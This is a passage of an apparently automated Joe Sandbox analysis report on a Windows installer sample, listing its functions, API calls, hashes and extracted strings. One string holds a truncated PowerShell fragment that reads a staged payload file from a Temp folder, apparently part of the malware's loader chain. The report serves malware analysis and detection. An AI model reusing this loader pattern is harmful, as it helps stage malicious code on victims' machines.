                                                                • Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                • Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D
                                                                Function 00404230 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SendMessageW.USER32(00000028,?,00000001,0040405B), ref: 0040423E
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1499233407.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499276984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499517645.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_TVPfW4WUdj.jbxd
                                                                Similarity
                                                                • API ID: MessageSend
                                                                • String ID:
                                                                • API String ID: 3850602802-0
                                                                • Opcode ID: 5ca98cf1e0c0583582b159413f58df588980414c8ed315818e52b16ce3e78aaf
                                                                • Instruction ID: b613885e7b2bd37cd291f1056477dd360c9db9b8968a6fc02a79c1078c08bd5c
                                                                • Opcode Fuzzy Hash: 5ca98cf1e0c0583582b159413f58df588980414c8ed315818e52b16ce3e78aaf
                                                                • Instruction Fuzzy Hash: 51B09235280600ABDE214B40DE49F467A62A7B4701F008178B240640B0CAB200A1DB19
                                                                Function 004058B0 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • ShellExecuteExW.SHELL32(?), ref: 004058BF
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1499233407.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499276984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499517645.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_TVPfW4WUdj.jbxd
                                                                Similarity
                                                                • API ID: ExecuteShell
                                                                • String ID:
                                                                • API String ID: 587946157-0
                                                                • Opcode ID: 635164c3b06ed96bf07ad63cc2cf624e21a1ddaff933affe27173adac056c9f0
                                                                • Instruction ID: 322818d701d9cc3fc85427ca8463de8bac6637280c84b784c1803e53dd53602d
                                                                • Opcode Fuzzy Hash: 635164c3b06ed96bf07ad63cc2cf624e21a1ddaff933affe27173adac056c9f0
                                                                • Instruction Fuzzy Hash: 55C092B2000200DFE301CF90CB08F067BF8AF59306F028058E1849A160C7788800CB69
                                                                Function 0040421D Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • KiUserCallbackDispatcher.NTDLL(?,00403FF4), ref: 00404227
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1499233407.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499276984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499517645.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_TVPfW4WUdj.jbxd
                                                                Similarity
                                                                • API ID: CallbackDispatcherUser
                                                                • String ID:
                                                                • API String ID: 2492992576-0
                                                                • Opcode ID: 01955649d6a23d6122fd97f0d30e7ef4bb95205b783011211b5c169bc8d67104
                                                                • Instruction ID: cd7a90ca9096364f54c072f0977fd0b21683179c1f8a6313e809ce6865a57a73
                                                                • Opcode Fuzzy Hash: 01955649d6a23d6122fd97f0d30e7ef4bb95205b783011211b5c169bc8d67104
                                                                • Instruction Fuzzy Hash: AFA01231100400ABCE124F50DF08C09BA31B7B43017104439A1400003086320420EB08
                                                                Function 00401F06 Relevance: 1.3, APIs: 1, Instructions: 37COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 004052EC: lstrlenW.KERNEL32(Completed,00000000,00410EA0,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000,?), ref: 00405324
                                                                  • Part of subcall function 004052EC: lstrlenW.KERNEL32(0040324F,Completed,00000000,00410EA0,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000), ref: 00405334
                                                                  • Part of subcall function 004052EC: lstrcatW.KERNEL32(Completed,0040324F,0040324F,Completed,00000000,00410EA0,004030B0), ref: 00405347
                                                                  • Part of subcall function 004052EC: SetWindowTextW.USER32(Completed,Completed), ref: 00405359
                                                                  • Part of subcall function 004052EC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040537F
                                                                  • Part of subcall function 004052EC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405399
                                                                  • Part of subcall function 004052EC: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A7
                                                                  • Part of subcall function 0040586D: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004266F0,Error launching installer), ref: 00405896
                                                                  • Part of subcall function 0040586D: CloseHandle.KERNEL32(?), ref: 004058A3
                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401F4D
                                                                  • Part of subcall function 0040670F: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406720
                                                                  • Part of subcall function 0040670F: GetExitCodeProcess.KERNEL32(?,?), ref: 00406742
                                                                  • Part of subcall function 004061CB: wsprintfW.USER32 ref: 004061D8
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1499233407.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499276984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499517645.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_TVPfW4WUdj.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                                • String ID:
                                                                • API String ID: 2972824698-0
                                                                • Opcode ID: 4bccf259bf579bfc981a9d644e2eeac5cb2ef6dcf81bcc0c58dbcf99a973db51
                                                                • Instruction ID: 3becab0f16e6f8309876834f620f7dc234fcc10e550b4e4e61bdbb7a81e04ee7
                                                                • Opcode Fuzzy Hash: 4bccf259bf579bfc981a9d644e2eeac5cb2ef6dcf81bcc0c58dbcf99a973db51
                                                                • Instruction Fuzzy Hash: 3EF09632905011DBCB20FBA1894459F76A49F00318B2445BBF902B21D1C77D0E519A6E

                                                                Non-executed Functions

                                                                Function 00404C68 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetDlgItem.USER32(?,000003F9), ref: 00404C80
                                                                • GetDlgItem.USER32(?,00000408), ref: 00404C8B
                                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 00404CD5
                                                                • LoadBitmapW.USER32(0000006E), ref: 00404CE8
                                                                • SetWindowLongW.USER32(?,000000FC,00405260), ref: 00404D01
                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D15
                                                                • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404D27
                                                                • SendMessageW.USER32(?,00001109,00000002), ref: 00404D3D
                                                                • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D49
                                                                • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D5B
                                                                • DeleteObject.GDI32(00000000), ref: 00404D5E
                                                                • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404D89
                                                                • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404D95
                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E2B
                                                                • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E56
                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E6A
                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00404E99
                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404EA7
                                                                • ShowWindow.USER32(?,00000005), ref: 00404EB8
                                                                • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404FB5
                                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040501A
                                                                • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 0040502F
                                                                • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405053
                                                                • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405073
                                                                • ImageList_Destroy.COMCTL32(?), ref: 00405088
                                                                • GlobalFree.KERNEL32(?), ref: 00405098
                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405111
                                                                • SendMessageW.USER32(?,00001102,?,?), ref: 004051BA
                                                                • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004051C9
                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 004051E9
                                                                • ShowWindow.USER32(?,00000000), ref: 00405237
                                                                • GetDlgItem.USER32(?,000003FE), ref: 00405242
                                                                • ShowWindow.USER32(00000000), ref: 00405249
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1499233407.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499276984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499517645.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_TVPfW4WUdj.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                • String ID: $M$N
                                                                • API String ID: 1638840714-813528018
                                                                • Opcode ID: db838c6bb8d772e12c4665b4b5b4d6ec78d20dbcb7ff8c3e764052d6be2fe8db
                                                                • Instruction ID: eb67e1f84f539b9e971c37d3801f2636e85636a2c3494a43e8d053fef61581d0
                                                                • Opcode Fuzzy Hash: db838c6bb8d772e12c4665b4b5b4d6ec78d20dbcb7ff8c3e764052d6be2fe8db
                                                                • Instruction Fuzzy Hash: E6027EB0A00209EFDB209F55CD45AAE7BB9FB44314F10857AF610BA2E1C7799E52CF58
                                                                Function 004046EC Relevance: 26.5, APIs: 10, Strings: 5, Instructions: 275stringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetDlgItem.USER32(?,000003FB), ref: 0040473B
                                                                • SetWindowTextW.USER32(00000000,?), ref: 00404765
                                                                • SHBrowseForFolderW.SHELL32(?), ref: 00404816
                                                                • CoTaskMemFree.OLE32(00000000), ref: 00404821
                                                                • lstrcmpiW.KERNEL32(: Completed,004236E8,00000000,?,?), ref: 00404853
                                                                • lstrcatW.KERNEL32(?,: Completed), ref: 0040485F
                                                                • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404871
                                                                  • Part of subcall function 004058CE: GetDlgItemTextW.USER32(?,?,00000400,004048A8), ref: 004058E1
                                                                  • Part of subcall function 00406518: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\TVPfW4WUdj.exe",00403334,C:\Users\user\AppData\Local\Temp\,75573420,004035A3,?,00000006,00000008,0000000A), ref: 0040657B
                                                                  • Part of subcall function 00406518: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 0040658A
                                                                  • Part of subcall function 00406518: CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\TVPfW4WUdj.exe",00403334,C:\Users\user\AppData\Local\Temp\,75573420,004035A3,?,00000006,00000008,0000000A), ref: 0040658F
                                                                  • Part of subcall function 00406518: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\TVPfW4WUdj.exe",00403334,C:\Users\user\AppData\Local\Temp\,75573420,004035A3,?,00000006,00000008,0000000A), ref: 004065A2
                                                                • GetDiskFreeSpaceW.KERNEL32(004216B8,?,?,0000040F,?,004216B8,004216B8,?,00000001,004216B8,?,?,000003FB,?), ref: 00404934
                                                                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040494F
                                                                  • Part of subcall function 00404AA8: lstrlenW.KERNEL32(004236E8,004236E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B49
                                                                  • Part of subcall function 00404AA8: wsprintfW.USER32 ref: 00404B52
                                                                  • Part of subcall function 00404AA8: SetDlgItemTextW.USER32(?,004236E8), ref: 00404B65
                                                                Strings
                                                                • "$Filicoid=Get-Content -Raw 'C:\Users\user\AppData\Local\Temp\depersonaliseredes\Defaulting19.Met';$Karikeringerne78=$Filicoid.S, xrefs: 00404705
                                                                • 6B, xrefs: 004047E9
                                                                • C:\Users\user\AppData\Local\Temp\depersonaliseredes, xrefs: 0040483C
                                                                • : Completed, xrefs: 0040484D, 00404852, 0040485D
                                                                • A, xrefs: 0040480F
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1499233407.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499276984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499517645.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_TVPfW4WUdj.jbxd
                                                                Similarity
                                                                • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                • String ID: "$Filicoid=Get-Content -Raw 'C:\Users\user\AppData\Local\Temp\depersonaliseredes\Defaulting19.Met';$Karikeringerne78=$Filicoid.S$: Completed$A$C:\Users\user\AppData\Local\Temp\depersonaliseredes$6B
                                                                • API String ID: 2624150263-2358544431
                                                                • Opcode ID: 1856695c990301f96b0bfae571b3bc84039281bd83faa45955c02c51b4778447
                                                                • Instruction ID: 1fca52776cba06a1556b538b397dade1a16f07a9c9d6655049f3c7fe444e155e
                                                                • Opcode Fuzzy Hash: 1856695c990301f96b0bfae571b3bc84039281bd83faa45955c02c51b4778447
                                                                • Instruction Fuzzy Hash: B4A180F1A00209ABDB11AFA6CD45AAF77B8EF84714F10843BF601B62D1D77C99418B6D
                                                                Function 00405996 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148filestringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • DeleteFileW.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\,75573420,00000000), ref: 004059BF
                                                                • lstrcatW.KERNEL32(004256F0,\*.*,004256F0,?,?,C:\Users\user\AppData\Local\Temp\,75573420,00000000), ref: 00405A07
                                                                • lstrcatW.KERNEL32(?,0040A014,?,004256F0,?,?,C:\Users\user\AppData\Local\Temp\,75573420,00000000), ref: 00405A2A
                                                                • lstrlenW.KERNEL32(?,?,0040A014,?,004256F0,?,?,C:\Users\user\AppData\Local\Temp\,75573420,00000000), ref: 00405A30
                                                                • FindFirstFileW.KERNEL32(004256F0,?,?,?,0040A014,?,004256F0,?,?,C:\Users\user\AppData\Local\Temp\,75573420,00000000), ref: 00405A40
                                                                • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405AE0
                                                                • FindClose.KERNEL32(00000000), ref: 00405AEF
                                                                Strings
                                                                • \*.*, xrefs: 00405A01
                                                                • "C:\Users\user\Desktop\TVPfW4WUdj.exe", xrefs: 00405996
                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 004059A4
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1499233407.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499276984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499517645.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_TVPfW4WUdj.jbxd
                                                                Similarity
                                                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                • String ID: "C:\Users\user\Desktop\TVPfW4WUdj.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                • API String ID: 2035342205-45611132
                                                                • Opcode ID: d3b1db4ec6e858d6de83fe0182b98463dfe8c84cfbcf579265b0cac0546164ac
                                                                • Instruction ID: c51eb27d53b6fe35fd8e31d26e19e594c53701a60ebafcf50548af423f91ca56
                                                                • Opcode Fuzzy Hash: d3b1db4ec6e858d6de83fe0182b98463dfe8c84cfbcf579265b0cac0546164ac
                                                                • Instruction Fuzzy Hash: 0641B530A00914AACB21BB658C89BAF7778EF45729F60427FF801711D1D7BC5981DEAE
                                                                Function 004043BA Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 204windowstringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404458
                                                                • GetDlgItem.USER32(?,000003E8), ref: 0040446C
                                                                • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404489
                                                                • GetSysColor.USER32(?), ref: 0040449A
                                                                • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004044A8
                                                                • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004044B6
                                                                • lstrlenW.KERNEL32(?), ref: 004044BB
                                                                • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004044C8
                                                                • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004044DD
                                                                • GetDlgItem.USER32(?,0000040A), ref: 00404536
                                                                • SendMessageW.USER32(00000000), ref: 0040453D
                                                                • GetDlgItem.USER32(?,000003E8), ref: 00404568
                                                                • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004045AB
                                                                • LoadCursorW.USER32(00000000,00007F02), ref: 004045B9
                                                                • SetCursor.USER32(00000000), ref: 004045BC
                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 004045D5
                                                                • SetCursor.USER32(00000000), ref: 004045D8
                                                                • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404607
                                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404619
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1499233407.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499276984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499517645.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_TVPfW4WUdj.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                • String ID: 1C@$: Completed$N
                                                                • API String ID: 3103080414-516214725
                                                                • Opcode ID: 5f098caee5535ae1e7b5b61cf078335e238ade03d1551e6bec200614ec9300dd
                                                                • Instruction ID: 9026ebbe03bb6d5dcd5a9bde039089338ffc2a6a86adc40c9d49ddbc6b033b78
                                                                • Opcode Fuzzy Hash: 5f098caee5535ae1e7b5b61cf078335e238ade03d1551e6bec200614ec9300dd
                                                                • Instruction Fuzzy Hash: D161A3B1A00209BFDB109F60DD45EAA7B79FB94305F00853AF705B62E0D779A952CF68
                                                                Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                • BeginPaint.USER32(?,?), ref: 00401047
                                                                • GetClientRect.USER32(?,?), ref: 0040105B
                                                                • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                • DeleteObject.GDI32(?), ref: 004010ED
                                                                • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                • DrawTextW.USER32(00000000,00429200,000000FF,00000010,00000820), ref: 00401156
                                                                • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                • DeleteObject.GDI32(?), ref: 00401165
                                                                • EndPaint.USER32(?,?), ref: 0040116E
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1499233407.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499276984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499517645.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_TVPfW4WUdj.jbxd
                                                                Similarity
                                                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                • String ID: F
                                                                • API String ID: 941294808-1304234792
